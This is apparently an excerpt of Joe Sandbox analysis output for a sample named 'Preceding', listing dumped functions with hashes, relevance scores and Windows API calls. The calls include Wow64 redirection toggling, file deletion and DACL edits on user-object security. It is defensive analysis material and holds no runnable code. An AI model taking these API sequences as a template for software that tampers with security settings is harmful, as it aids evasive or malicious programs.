Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 85c410a514cb3bd9bb77cf36bdf1c2d151dbbaac7af2e244f1287b1e8c9b68b1
Instruction ID: 01fcb62393d0dade5964b3e793b702b9cb765618d176e7853573bb03f21781f6
Opcode Fuzzy Hash: 85c410a514cb3bd9bb77cf36bdf1c2d151dbbaac7af2e244f1287b1e8c9b68b1
Instruction Fuzzy Hash: 20F05E7A665744AFD703BF70EC0AB6637A8A706B0BF004855B609861F2DBBA95748F40

Function 0028CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0028CEEE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 28dbbdbddbd90effdd24d4c45c574c2c1688a85b3f64d16456ab492487da5024
Instruction ID: 6382df3d5c90127bb0d06559f84056589b476f97671c5472c73875d138f4041e
Opcode Fuzzy Hash: 28dbbdbddbd90effdd24d4c45c574c2c1688a85b3f64d16456ab492487da5024
Instruction Fuzzy Hash: 3732F778920206AFDF10EF54C884EBAB7B9FF45354F24805AE9059B7A1C774ED61CB60

Function 00307AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: e5cf9103eb5b0d0893a03b69bed8a0b4d1a892ced622dad7b9c3295494ddd066
Instruction ID: 3d2db20f082f843e0a5a04f5fb069acc4f0bb58329476cfffd52c1d30499d7be
Opcode Fuzzy Hash: e5cf9103eb5b0d0893a03b69bed8a0b4d1a892ced622dad7b9c3295494ddd066
Instruction Fuzzy Hash: AFD17A34E06209EFCB15EF98C8919ADBBB5FF48310F14405AE915AB291DB30AE91CF90

Function 002AF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0fcdde5ee17611be7e7a6a4d6fd139393c098b853fbb978d41e602783113f0
Instruction ID: a686c9b3e6799b6d0d748d920860bf2d0ec3c1235bf320e544a59841071788a2
Opcode Fuzzy Hash: ce0fcdde5ee17611be7e7a6a4d6fd139393c098b853fbb978d41e602783113f0
Instruction Fuzzy Hash: 3E512C35A20104AFDB50DFD8C940BA97BE5EF86364F198168EC089B351DB75DD52CB90

Function 002EFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 002EFCCE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 8d49403b707fd3153cbb9dfa7c3e9afdb220afafa99f8bb46cc7358dea88d41a
Instruction ID: 6d0b909d46fcc96cc4ef145ab29efc19361a93cfc3e9f1bad261efcaff4a2f59
Opcode Fuzzy Hash: 8d49403b707fd3153cbb9dfa7c3e9afdb220afafa99f8bb46cc7358dea88d41a
Instruction Fuzzy Hash: 1141F57651024AAFCB11EF69CD819AEB7F8EF48310B61853EE51697291EB70DE10CB50

Function 00286679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0028663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0028668B,?,?,002862FA,?,00000001,?,?,00000000), ref: 0028664A
Part of subcall function 0028663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0028665C
Part of subcall function 0028663E: FreeLibrary.KERNEL32(00000000,?,?,0028668B,?,?,002862FA,?,00000001,?,?,00000000), ref: 0028666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002862FA,?,00000001,?,?,00000000), ref: 002866AB

Part of subcall function 00286607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C5657,?,?,002862FA,?,00000001,?,?,00000000), ref: 00286610
Part of subcall function 00286607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00286622
Part of subcall function 00286607: FreeLibrary.KERNEL32(00000000,?,?,002C5657,?,?,002862FA,?,00000001,?,?,00000000), ref: 00286635

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 441f6bcb7d7522d4166526ccedba6b4f2d4f2b7ba53a2a8d8eab4c90d28791db
Instruction ID: 4be07d8aa45aa64c7c6659592d0a9474df30707b4bb0171d5f2d097544ed4958
Opcode Fuzzy Hash: 441f6bcb7d7522d4166526ccedba6b4f2d4f2b7ba53a2a8d8eab4c90d28791db
Instruction Fuzzy Hash: 76112B35621215ABCF14BF60C80ABAD77A99F50710F20442DF542A61C1EF79DA259F50

Function 002B8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 002B87C0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 5629abb776dd52d58394a21a939873ff4d2568d27a6edb174fc1188932e670d3
Instruction ID: 2690662836156db1e5804cfcd716b8e7aefa19ebabc842e516afd16e01c7bb2f
Opcode Fuzzy Hash: 5629abb776dd52d58394a21a939873ff4d2568d27a6edb174fc1188932e670d3
Instruction Fuzzy Hash: 0111487690420AAFCF05DF58E940EDA7BF8EF48304F114069F809AB311DA31EA21CBA5

Function 002B5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002B4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,002B319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 002B5031

_free.LIBCMT ref: 002B53DF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: d40751ec285e98185c14dd0d4c1f0011c74a0115b11bd3a6be09985d1f2340c1
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: FB014E722103056BE331CF55D881A9AFBEDEB853B0F25055DF584872C0EB706805C774

Function 002AE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 7b38c357cd205d1ee005e11ecfa35341ddecaf6f73e53bde9e83681e929f7606
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 5DF0F432530B219BEA313A6A9C05B9B32988F43374F154B26F425975D1EE74E8238AD2

Function 002B4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,002B319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 002B5031

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fe661262e56df73c2545ff422826ee8d9a12ab306b3689feddc2a2ce35b2947a
Instruction ID: 16771899260b33f485069b927eb5dba37884375cbb28f6a86983e7090b9ae991
Opcode Fuzzy Hash: fe661262e56df73c2545ff422826ee8d9a12ab306b3689feddc2a2ce35b2947a
Instruction Fuzzy Hash: E7F0B436534E3567EB313E669C01BDB3758AF4A7E0F188821B8149F090DA60D8214AE0

Function 002B3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,002A6A79,?,0000015D,?,?,?,?,002A85B0,000000FF,00000000,?,?), ref: 002B3BC5

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 224b31698e31a4791859bb2a2a6c94d049aec641121f84fe5f53015b67e09a49
Instruction ID: 5d2528b7331669a1c2434dde55a9a1d19b60fd0d7c6e9b10ba0bc7f031c1d65d
Opcode Fuzzy Hash: 224b31698e31a4791859bb2a2a6c94d049aec641121f84fe5f53015b67e09a49
Instruction Fuzzy Hash: F0E02231230632A7DA21BE769C01BDB3A4CEF423E8F1401A0FC14960A8EF70CE2089E0

Function 002866E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544ad87f08363ebd4de0c11e3c1d264d45af89565a0541c44dd6cfe0ac870778
Instruction ID: a8fcea456a18c168cfe50997356158f4cf0c679563a0084d739470ff99687c0e
Opcode Fuzzy Hash: 544ad87f08363ebd4de0c11e3c1d264d45af89565a0541c44dd6cfe0ac870778
Instruction Fuzzy Hash: 10F03975126712CFCB38AF64D8A4816BBE8FF143293248A3EE5D786610C775A8A0DF51

Function 002D6AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 002D6AE0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2868643e3565f387d64072c9ea9b0448932f9d8c424da129a0e4897b293ac056
Instruction ID: f8c1b6b90e156965500f804ddb41591b1faa1569bf27ebaa09bbe0180b25ac51
Opcode Fuzzy Hash: 2868643e3565f387d64072c9ea9b0448932f9d8c424da129a0e4897b293ac056
Instruction Fuzzy Hash: 2EF0E571734202AAEB204F66A80D7A1F7E8BB10314F10452BD4D582281CBF258B49B52

Function 0028684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00286868

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 59c739ceddc981bccdc02cf40e5c61436608dc35f5a922cf0951e4bddcc5a8fb
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 50F0587541020DFFDF04DF80C941E9EBBB9FB04318F208089F9148A151C336EA61ABA0

Function 00283907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00283963

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 2ca48e3c7cd85481fb6bdc86e8253012c8e4ed0cae6a794f2e653a4a032e08af
Instruction ID: 270ca68ab18f949cefdb61f530550fe8c23806077bad3e6395970a922b6d0dde
Opcode Fuzzy Hash: 2ca48e3c7cd85481fb6bdc86e8253012c8e4ed0cae6a794f2e653a4a032e08af
Instruction Fuzzy Hash: D6F0A7709103149FE793DF24DC457D67BBCA702708F0000A5A64496192DB745788CF81

Function 00283A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00283A76

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: e9a60f4d0dcac3ed7bd270eed056642063806d41beb852d4096f8cbd71bc9804
Instruction ID: 95dc51e5bbc38374fbce0d1f5bf14bb20791403002ff906af29cb175ff5c32be
Opcode Fuzzy Hash: e9a60f4d0dcac3ed7bd270eed056642063806d41beb852d4096f8cbd71bc9804
Instruction Fuzzy Hash: F5E0C276A012245BCB21A258AC06FEAB7EDDFC87A0F4541B5FC09D7258DD74ED80CA90

Function 002C071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,002C0A84,?,?,00000000,?,002C0A84,00000000,0000000C), ref: 002C0737

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8aa9cf6099f787817ac6efbf596efd9db48b7fece17f77c87d2673cdacfa801d
Instruction ID: ce135ac700e6cae257639dc8be1164f25fbc809d8e050ffe7e920c87c3b8c9a1
Opcode Fuzzy Hash: 8aa9cf6099f787817ac6efbf596efd9db48b7fece17f77c87d2673cdacfa801d
Instruction Fuzzy Hash: 3AD06C3204010DBBDF028F84DD06EDA3BAAFB4C714F018010BE1856020C732E821AB90

Function 002EEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,002ED840), ref: 002EEAB1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: dee2de17d67332e9741994ca000fee4bdca30f155179434eb7a63c4de7dfd3f8
Instruction ID: 8f04a814787176937f1ca1c2f43f8af829659b55c1771e13ad01611a2126f982
Opcode Fuzzy Hash: dee2de17d67332e9741994ca000fee4bdca30f155179434eb7a63c4de7dfd3f8
Instruction Fuzzy Hash: 28B0922406064105AD284E396A099D9330478433A5BDE1FD8E479852E1C339882FA950

Function 002F664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 002EDC54: FindFirstFileW.KERNEL32(?,?), ref: 002EDCCB
Part of subcall function 002EDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 002EDD1B
Part of subcall function 002EDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002EDD2C
Part of subcall function 002EDC54: FindClose.KERNEL32(00000000), ref: 002EDD43

GetLastError.KERNEL32 ref: 002F666E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 6f45b271577450f47d10167871b8a47baf6d46484470785e6c612417d64d581a
Instruction ID: 1bafc1da613630a42afed6006c52d6a2d513e49c5e692d3ff72c78ad00d76a67
Opcode Fuzzy Hash: 6f45b271577450f47d10167871b8a47baf6d46484470785e6c612417d64d581a
Instruction Fuzzy Hash: 20F082392201145FDB14FF59D455B6EB7E9AF88360F048419F9058B392CB74BC11CF90

Non-executed Functions

Function 002E14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1A60
Part of subcall function 002E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A6C
Part of subcall function 002E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A7B
Part of subcall function 002E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A82
Part of subcall function 002E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002E1518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002E154C
GetLengthSid.ADVAPI32(?), ref: 002E1563
GetAce.ADVAPI32(?,00000000,?), ref: 002E159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002E15B9
GetLengthSid.ADVAPI32(?), ref: 002E15D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 002E15D8
HeapAlloc.KERNEL32(00000000), ref: 002E15DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 002E1600
CopySid.ADVAPI32(00000000), ref: 002E1607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002E1636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002E1658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 002E166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E1691
HeapFree.KERNEL32(00000000), ref: 002E1698
